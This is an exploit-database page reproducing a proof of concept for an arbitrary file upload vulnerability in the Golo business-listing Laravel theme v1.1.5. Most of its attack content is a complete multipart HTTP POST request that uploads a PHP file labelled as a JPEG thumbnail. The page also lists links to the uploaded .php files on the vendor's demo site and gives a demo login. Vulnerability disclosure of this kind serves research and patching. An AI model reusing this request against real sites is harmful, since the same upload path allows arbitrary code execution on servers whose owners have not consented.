Advertisement






Golo - Business Listing, City Travel Guide Laravel Theme v1.1.5 - Arbitrary File Upload

CVE Category Price Severity
CWE-434 Not specified High
Author Risk Exploitation Type Date
Exploitalert Team High Remote 2020-07-13
CPE
cpe:cpe:/a:golothemes:golo_business_listing_city_travel_guide_theme_v1.1.5
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070070

Below is a copy:

Golo - Business Listing, City Travel Guide Laravel Theme v1.1.5 - Arbitrary File Upload
[+] Exploit Title: Golo - Business Listing, City Travel Guide Laravel Theme v1.1.5 - Arbitrary File Upload
[+] Google Dork: n/a
[+] Date: 2020-07-02
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Uxper [ http://uxper.co ]
[+] Software Version: 1.1.5
[+] Software Link: https://codecanyon.net/item/golo-city-guide-laravel-theme/25785389
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-434



### [ Info: ]

[i] An Arbitrary File Upload vulnerability was discovered in the Golo Laravel theme v1.1.5.

[i] Demo account: [email protected] / ASKDU@$HDNAJFN@# (login / password)

[i] PoC Link #1: https://lara-business.getgolo.com/uploads/5f09c6d90c71c_1594476249.php

[i] PoC Link #2: https://lara-business.getgolo.com/uploads/5f09c6dcdde81_1594476252.php

[i] PoC Link #3: https://lara-business.getgolo.com/uploads/5f09c6df3b17d_1594476255.php

[i] PoC Link #4: https://lara-business.getgolo.com/uploads/5f09c3f7ec959_1594475511.svg



### [ PoC: ]

[!] POST /place HTTP/1.1
Host: lara-business.getgolo.com
Content-Type: multipart/form-data; boundary=---------------------------24734096191242901897977687797
Content-Length: 4732
Origin: https://lara-business.getgolo.com
Referer: https://lara-business.getgolo.com/new-place
Cookie: [cookies_here]

-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="_token"

i6gbRoTMcw6JP9U23pHR3b2IvxSDGrHSPJBroucJ
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="en[name]"

Night City
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="price_range"

4
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="en[description]"

PoC
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="category[]"

20
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="place_type[]"

33
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="amenities[]"

13
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="amenities[]"

9
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="amenities[]"

6
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="country_id"

11
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="city_id"

26
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="address"

31337
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="lat"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="lng"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="email"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="phone_number"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="website"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="social[0][name]"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="social[0][url]"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[0][title]"

Monday
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[0][value]"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[1][title]"

Tuesday
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[1][value]"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[2][title]"

Wednesday
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[2][value]"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[3][title]"

Thursday
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[3][value]"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[4][title]"

Friday
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[4][value]"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[5][title]"

Saturday
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[5][value]"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[6][title]"

Sunday
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="opening_hour[6][value]"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="thumb"; filename="vladvector.php"
Content-Type: image/jpeg


<?php
phpinfo();
?>
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="gallery[]"

vladvector.php
-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="video"


-----------------------------24734096191242901897977687797
Content-Disposition: form-data; name="place_id"


-----------------------------24734096191242901897977687797--



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum